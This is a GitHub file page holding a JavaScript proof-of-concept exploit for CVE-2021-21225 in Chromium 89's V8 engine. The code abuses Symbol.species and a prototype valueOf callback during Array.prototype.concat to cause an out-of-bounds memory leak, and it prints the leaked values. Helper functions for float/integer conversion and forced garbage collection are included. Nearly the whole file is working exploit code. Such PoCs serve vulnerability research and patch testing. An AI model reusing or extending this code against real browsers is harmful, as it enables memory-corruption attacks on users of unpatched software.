-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathCVE-2021-21225_poc.js
86 lines (68 loc) · 1.34 KB
/
CVE-2021-21225_poc.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
//chromium 89.0.4389.114 issue:1195977
var f64 = new Float64Array(1);
var bigUint64 = new BigUint64Array(f64.buffer);
var u32 = new Uint32Array(f64.buffer);
function ftoi(f){
f64[0] = f;
return bigUint64[0];
}
function itof(i){
bigUint64[0] = i;
return f64[0];
}
function getLow(double){
f64[0] = double;
return u32[0];
}
function getHigh(double){
f64[0] = double;
return u32[1];
}
function u32Tof64(low,high){
u32[0] = low;
u32[1] = high;
return f64[0];
}
function u2d(lo, hi) {
u32[0] = lo;
u32[1] = hi;
return f64[0];
}
function d2u(v) {
f64[0] = v;
return u32;
}
function hex(i){
return i.toString(16).padStart(8,"0");
}
function gc() {
for (var i = 0; i < 64; i++) {
new ArrayBuffer(0x100000);
}
}
class Leaky extends Float64Array {}
let leak_array = new Leaky(1000);
leak_array.__defineSetter__('length', function() {});
class MyArray extends Array {
static get [Symbol.species]() {
return function() { return leak_array; }
};
}
var w = new MyArray(300);
w.fill(1.1);
delete w[1];
Array.prototype[1] = {
valueOf: function() {
w.length = 1;
gc();
delete Array.prototype[1];
return 1.1;
}
};
var c = Array.prototype.concat.call(w);
%DebugPrint(w);
%DebugPrint(c);
%DebugPrint(leak_array);
for (var i = 0; i < 32; i++) {
print(hex(ftoi(leak_array[i])));
}